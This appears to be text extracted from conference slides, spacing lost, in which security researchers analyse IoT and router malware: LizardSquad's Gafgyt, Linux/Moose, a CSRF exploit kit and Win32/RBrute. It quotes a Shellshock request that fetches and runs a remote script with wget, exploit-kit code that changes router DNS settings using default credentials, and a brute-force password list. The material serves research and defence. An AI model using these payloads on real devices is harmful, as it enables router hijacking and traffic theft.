iot or internet of - gosecure.github.io · only available to a set of whitelisted ip addresses...

.

IoTorInternetof{Things,Threats}

Thomas(@nyx__o)MalwareResearcheratESETCTFloverOpensourcecontributor

Olivier(@obilodeau)SecurityResearcheratGoSecurePreviouslyMalwareResearcheratESETInfoseclectureratETSUniversityinMontrealInfosecdeveloper,networkadmin,linuxsystemadmin

Co-founderMontrehack(hands-onsecurityworkshops)FounderNorthSecHackerJeopardy

AgendaAboutIOTLizardSquadLinux/MooseExploitKitWin32/RBruteConclusion

WhyItMatters?HardtodetectHardtoremediateHardtofixLowhangingfruitforbadguys

ARealThreatSeveralcasesdisclosedinthelasttwoyearsAlotofsame-oldbackgroundnoise(DDoSer)Thingsareonlygettingworse

Wait,isIoTmalwarereallyaboutthings?

No.Notyet.No.Notyet.

Sowhatkindofmalwarecanwefindonsuchinsecuredevices?

LizardSquadLizardSquad

WhoareLizardSquad?BlackhathackinggroupLotsofDistributedDenialofService(DDoS)DDoSPlayStationNetworkandXboxliveinChristmas2014BombthreatsDDoSforhire(LizardStresser)

DesCYBER-DesCYBER-CHENAPANS!CHENAPANS!

TheMalwareLinux/GafgytLinux/Powbot,Linux/Aidra,Kaiten,…Probablyothers,assourceispublic

CaracteristicsTelnetscannerFlooding:UDP,TCP,JunkandHold

SomeServerCode"*****************************************""*WELCOMETOTHEBALLPIT*""*Nowwith*refrigerator*support*""*****************************************"

AttackVectorsShellshockSSHcredentialsbrute-forceTelnetcredentialsbrute-force

ExempleofShellshockAttempt

GET/cgi-bin/authLogin.cgiHTTP/1.1Host:127.0.0.1Cache-Control:no-cacheConnection:Keep-AlivePragma:no-cacheUser-Agent:(){goo;};wget-qO-http://o.kei.su/qn|sh>/dev/null2>&1&

OtherVariantsHTTPSsupportCloudFlareprotectionbypass

Sophisticated?LizardStresserdatabasewasleakedPasswordsinplaintext…

IRCCommandandControl

-------Daychangedto08/25/15-------09:32-!-Thereare0usersand2085invisibleon1servers09:32-!-42unknownconnection(s)09:32-!-3channelsformed09:32-!-Ihave2085clientsand0servers09:32-!-20852119Currentlocalusers2085,max211909:32-!-20852119Currentglobalusers2085,max2119

BotMasters12:56-!-Topicfor#Fazzix:1k12:56-!-Topicsetbyvoid<>(WedAug1909:58:452015)12:56[Users#Fazzix]12:56[~void][~void_][@bob1k][@Fazzix][Myutro]·12:56-!-Irssi:#Fazzix:Totalof5nicks(4ops,0halfops,0voices,1normal)12:56-!-Channel#FazzixcreatedMonAug1703:11:29201512:56-!-Irssi:Jointo#Fazzixwassyncedin2secs

Linux/MooseLinux/Moose

Linux/MooseDiscoveredinNovember2014Thoroughlyanalyzedinearly2015PublishedareportinlateMay2015

MooseDNAakaMalwaredescription

Hangtight,thisisarecap

Linux/Moose…Namedafterthestring"elan"presentinthemalware

executable

Elan…?

TheLotusElan

ElánTheSlovakrockband(from1969andstillactive)

NetworkCapabilitiesPivotthroughfirewallsHome-madeNATtraversalCustom-madeProxyserviceonlyavailabletoasetofwhitelistedIPaddresses

Remotelyconfiguredgenericnetworksniffer

AttackVectorTelnetcredentialsbruteforceWordlistof304user/passentriessentbyserver

CompromiseProtocol

Anti-AnalysisStaticallylinkedbinarystrippedofitsdebuggingsymbolsHardtoreproduceenvironmentrequiredformalwaretooperateMisleadingstrings(getcool.com)

MooseHerdingTheMalwareOperation

ViaC&CConfigurationNetworksnifferwasusedtostealHTTPCookiesTwitter:twll,twidFacebook:c_userInstagram:ds_user_idGoogle:SAPISID,APISIDGooglePlay/Android:LAY_ACTIVE_ACCOUNTYoutube:LOGIN_INFO

ViaProxyUsageAnalysisNatureoftrafficProtocolTargetedsocialnetworks

AnExample

AnExample(cont.)

AnExample(cont.)

AnExample(cont.)

Anti-TrackingProxyaccessisprotectedbyanIP-basedWhitelistSowecan’tusetheproxyservicetoevaluatemalwarepopulationBlindbecauseofHTTPSenforcedonsocialnetworks

AStrangeAnimalnotintheDDoSorbitcoinminingbusinessnox86variantfoundcontrolledbyasinglegroupofactors

Status

WhitepaperImpactFewweeksafterthepublicationtheC&CserverswentdarkAfterareboot,allaffecteddevicesshouldbecleanedButvictimscompromisedviaweakcredentials,sotheycanalwaysreinfect

Aliveordead?

Yay!Except…

Linux/MooseUpdateNewsampleinSeptemberNewproxyserviceport(20012)NewC&CselectionalgorithmFewdifferencesStillunderscrutiny

ExploitKitTargetingExploitKitTargetingRoutersRouters

ExploitKitDefinitionAutomateexploitationTargetsbrowsersCommonexploitsareAdobeandJava

source:Malwarebytes

ExploitKitinAction

ExploitKitinAction(cont.)

Cross-SiteRequestForgery(CSRF)Usesdefaultcredential(HTTP)ChangesprimaryDomainNameSystem(DNS)

ExploitKitCSRF<html><head><scripttype="text/javascript"src<body><iframeid="iframe"sandbox="allow-same-origin"<scriptlanguage="javascript">

ExploitKitHow-Tofunctione_belkin(ip){varmethod="POST";varurl="";vardata="";url="http://"+ip+"/cgi-bin/login.exe?pws=admin"exp(url,"","GET");url="http://"+ip+"/cgi-bin/setup_dns.exe";data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="exp(url,data,method);}

ExploitKitcontinuallyimprovedObfuscationExploitsforCVEs

ExploitKit-CVECVE-2015-1187D-LinkDIR-636LRemoteCommandInjectionIncorrectAuthentication

RecapExploitKitChangeDNSFileless

WhatCanTheyDo?UniversalXSSonallHTTPsitesfetchingJavascriptona3rdpartydomainPhishingAdfraud

YouSaidAdfraud?InjectionviaGoogleanalyticsdomainhijackingJavascriptrunsincontextofeverypage

ExempleofGoogleAnalyticsSubstitution'adcash':function(){varadcash=document.createElement('script'adcash.type='text/javascript';adcash.src='http://www.adcash.com/script/java.php?option=rotateur&r=274944'document.body.appendChild(adcash);},

Win32/RBrute(cont.)Triestofindadministrationwebpages(IP)ScanandreportRoutermodelisextractedfromtherealmattributeoftheHTTPauthentication

Win32/RBruteTargets$stringsrbrute.exe[...]TD-W8901GTD-W8901GBTD-W8951NDTD-W8961NDTD-8840TTD-W8961NDTD-8816TD-8817TD-W8151NTD-W8101GZXDSL831CIIZXV10W300[...]DSL-2520UDSL-2600UDSLrouterTD-W8901GTD-W8901G3.0TD-W8901GBTD-W8951NDTD-W8961ND

Win32/RBruteBruteforceLogins:admin,support,root&AdministratorPasswordlistretrievedfromtheCnC

<emptystring>1111111234512345612345678abc123adminAdministratorconsumerdragongizmodoiqrquksmletmeinlifehackmonkeypasswordqwertyrootsoporteETB2006support

Win32/RBruteChangingDNS

http://<router_IP>/&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Savehttp://<router_IP>/dnscfg.cgi?dnsPrimary=<malicious_DNS>http://<router_IP>/Enable_DNSFollowing=1&dnsPrimary=

Win32/RBruteNextStepSimpleredirectiontofakeChromeinstaller(facebookorgoogledomains)Install(useractionrequired)ChangeprimaryDNSonthecomputer(viakeyregistry)

HKLM/SYSTEM/ControlSet001/Services/Tcpip/Parameters/Interfaces/{networkinterfaceUUID}/NameServer

WhyreinfectsomeonebyRBruteandnotSality?

Win32/RBruteInACoffeeShop

InfecteduserInfectedrouterEveryoneisinfected

RBruteandSality

ConclusionEmbeddedmalware

NotyetcomplexToolsandprocessesneedtocatchupalowhangingfruitPreventionsimple

Thanks!Thankyou!SpecialthankstoESETCanadaResearchTeam

Questions?Questions?

@obilodeau@nyx__o

Referenceshttp://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdfhttp://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.htmlhttps://gist.github.com/josephwegner/1d20f1ce1d59b61172e1http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/